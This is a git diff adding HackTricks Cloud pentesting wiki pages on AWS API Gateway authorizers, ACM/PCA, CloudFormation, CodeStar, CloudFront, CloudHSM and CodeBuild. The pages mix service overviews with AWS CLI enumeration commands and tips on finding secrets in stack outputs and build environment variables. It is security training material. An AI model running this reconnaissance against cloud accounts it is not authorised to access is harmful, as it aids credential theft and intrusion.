+            'body': 'Unauthorized'
+        }
+
+    try:
+        # Replace this with your own token validation logic
+        if token == "your-secret-token":
+            return generate_policy('user', 'Allow', method_arn)
+        else:
+            return generate_policy('user', 'Deny', method_arn)
+    except Exception as e:
+        print(e)
+        return {
+            'statusCode': 500,
+            'body': 'Internal Server Error'
+        }
+
+def generate_policy(principal_id, effect, resource):
+    policy = {
+        'principalId': principal_id,
+        'policyDocument': {
+            'Version': '2012-10-17',
+            'Statement': [
+                {
+                    'Action': 'execute-api:Invoke',
+                    'Effect': effect,
+                    'Resource': resource
+                }
+            ]
+        }
+    }
+    return policy
+```
+
+</details>
+
+Call it with something like:
+
+<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>curl "https://jhhqafgh6f.execute-api.eu-west-1.amazonaws.com/prod/custom_auth" -H 'Authorization: your-secret-token'
+</strong></code></pre>
+
+{% hint style="warning" %}
+Depending on the Lambda code, this authorization might be vulnerable
+{% endhint %}
+
+Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}`
+
+This way you could **identify this authorization** being in place.
+
+### Required API Key
+
+It's possible to set API endpoints that **require a valid API key** to contact it.
+
+<figure><img src="../../../.gitbook/assets/image (88).png" alt=""><figcaption></figcaption></figure>
+
+It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month).
+
+To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key:
+
+<figure><img src="../../../.gitbook/assets/image (198).png" alt=""><figcaption></figcaption></figure>
+
+## Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md" %}
+[aws-api-gateway-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+## Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-apigateway-privesc.md" %}
+[aws-apigateway-privesc.md](../aws-privilege-escalation/aws-apigateway-privesc.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-api-gateway-post-exploitation.md" %}
+[aws-api-gateway-post-exploitation.md](../aws-post-exploitation/aws-api-gateway-post-exploitation.md)
+{% endcontent-ref %}
+
+## Persistence
+
+{% content-ref url="../aws-persistence/aws-api-gateway-persistence.md" %}
+[aws-api-gateway-persistence.md](../aws-persistence/aws-api-gateway-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
new file mode 100644
index 0000000000..52437363f7
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
@@ -0,0 +1,87 @@
+# AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**.
+
+A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services.
+
+**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization.
+
+## Enumeration
+
+### ACM
+
+```bash
+# List certificates
+aws acm list-certificates
+
+# Get certificate info
+aws acm describe-certificate --certificate-arn <arn> # Check "InUseBy" to check which resources are using it
+
+# Get certificate data
+aws acm get-certificate --certificate-arn "arn:aws:acm:us-east-1:188868097724:certificate/865abced-82c9-43bf-b7d2-1f4948bf353d"
+
+# Account configuration
+aws acm get-account-configuration
+```
+
+### PCM
+
+```bash
+# List CAs
+aws acm-pca list-certificate-authorities
+
+# Get CA info
+aws acm-pca describe-certificate-authority --certificate-authority-arn <arn>
+
+# Get CA Permissions
+aws acm-pca list-permissions --certificate-authority-arn <arn>
+
+# Get CA certificate
+aws acm-pca get-certificate-authority-certificate --certificate-authority-arn <arn>
+
+# Certificate request
+aws acm-pca get-certificate-authority-csr --certificate-authority-arn <arn>
+
+# Get CA Policy (if any)
+aws acm-pca get-policy --resource-arn <arn>
+```
+
+## Privesc
+
+TODO
+
+## Post Exploitation
+
+TODO
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
new file mode 100644
index 0000000000..a4e9343ab0
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
@@ -0,0 +1,101 @@
+# AWS - CloudFormation & Codestar Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## CloudFormation
+
+AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure.
+
+### Enumeration
+
+```bash
+# Stacks
+aws cloudformation list-stacks
+aws cloudformation describe-stacks # You could find sensitive information here
+aws cloudformation list-stack-resources --stack-name <name>
+aws cloudformation get-template --stack-name cloudformationStack
+aws cloudformation describe-stack-events --stack-name cloudformationStack 
+
+## Show params and outputs 
+aws cloudformation describe-stacks | jq ".Stacks[] | .StackId, .StackName, .Parameters, .Outputs"
+
+# Export
+aws cloudformation list-exports
+aws cloudformation list-imports --export-name <x_name>
+
+# Stack Sets
+aws cloudformation list-stack-sets
+aws cloudformation describe-stack-set --stack-set-name <name>
+aws cloudformation list-stack-instances --stack-set-name <name>
+aws cloudformation list-stack-set-operations --stack-set-name <name>
+aws cloudformation list-stack-set-operation-results --stack-set-name <name> --operation-id <id>
+```
+
+### Privesc
+
+In the following page you can check how to **abuse cloudformation permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-cloudformation-privesc/" %}
+[aws-cloudformation-privesc](../aws-privilege-escalation/aws-cloudformation-privesc/)
+{% endcontent-ref %}
+
+### Post-Exploitation
+
+Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation
+
+## Codestar
+
+AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members).
+
+### Enumeration
+
+```bash
+# Get projects information
+aws codestar list-projects
+aws codestar describe-project --id <project_id>
+aws codestar list-resources --project-id <project_id>
+aws codestar list-team-members --project-id <project_id>
+
+ aws codestar list-user-profiles
+ aws codestar describe-user-profile --user-arn <arn>
+```
+
+### Privesc
+
+In the following page you can check how to **abuse codestar permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-codestar-privesc/" %}
+[aws-codestar-privesc](../aws-privilege-escalation/aws-codestar-privesc/)
+{% endcontent-ref %}
+
+## References
+
+* [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
new file mode 100644
index 0000000000..d80ef3c21b
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
@@ -0,0 +1,70 @@
+# AWS - CloudFront Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## CloudFront
+
+CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
+
+The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**.
+
+**By default cookie logging is disabled** but you can enable it.
+
+### Functions
+
+You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS).
+
+As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature.
+
+### Enumeration
+
+```bash
+aws cloudfront list-distributions
+aws cloudfront get-distribution --id <id> # Just get 1
+aws cloudfront get-distribution-config --id <id> 
+
+aws cloudfront list-functions
+aws cloudfront get-function --name TestFunction function_code.js
+
+aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME"
+```
+
+## Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md" %}
+[aws-cloudfront-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-cloudfront-post-exploitation.md" %}
+[aws-cloudfront-post-exploitation.md](../aws-post-exploitation/aws-cloudfront-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
new file mode 100644
index 0000000000..91f30bd3e6
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
@@ -0,0 +1,93 @@
+# AWS - CloudHSM Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## HSM - Hardware Security Module
+
+Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used.
+
+The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads
+
+Typically, a device is available within 15 minutes assuming there is capacity, but in some zones there could not be.
+
+Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS.
+
+In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\
+Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution.
+
+Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster.
+
+If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys.
+
+**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution.
+
+**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\
+Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance.
+
+**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you.
+
+### CloudHSM Suggestions
+
+1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
+2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
+3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear.
+4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed.
+5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool.
+6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance.
+7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source.
+
+The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month.
+
+The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**.
+
+The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
+
+### What is a Hardware Security Module
+
+A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system.
+
+The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur:
+
+1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator.
+2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**.
+3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation.
+4. **Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering.
+5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes.
+
+HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government.
+
+Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure.
+
+### Enumeration
+
+```
+TODO
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
new file mode 100644
index 0000000000..7798cea35f
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
@@ -0,0 +1,102 @@
+# AWS - Codebuild Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## CodeBuild
+
+AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass:
+
+1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance.
+2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process.
+3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment.
+
+AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability.
+
+### **Github/Gitlab/Bitbucket Credentials**
+
+#### **Default source credentials**
+
+This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials.
+
+The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs.
+
+#### Custom source credential
+
+Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**.
+
+This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one.
+
+### Enumeration
+
+```bash
+# List external repo creds (such as github tokens)
+## It doesn't return the token but just the ARN where it's located
+aws codebuild list-source-credentials
+
+# Projects
+aws codebuild list-shared-projects
+aws codebuild list-projects
+aws codebuild batch-get-projects --names <project_name> # Check for creds in env vars
+
+# Builds
+aws codebuild list-builds
+aws codebuild list-builds-for-project --project-name <p_name>
+aws codebuild list-build-batches
+aws codebuild list-build-batches-for-project --project-name <p_name>
+
+# Reports
+aws codebuild list-reports
+aws codebuild describe-test-cases --report-arn <ARN>
+```
+
+### Privesc
+
+In the following page, you can check how to **abuse codebuild permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-codebuild-privesc.md" %}
+[aws-codebuild-privesc.md](../aws-privilege-escalation/aws-codebuild-privesc.md)
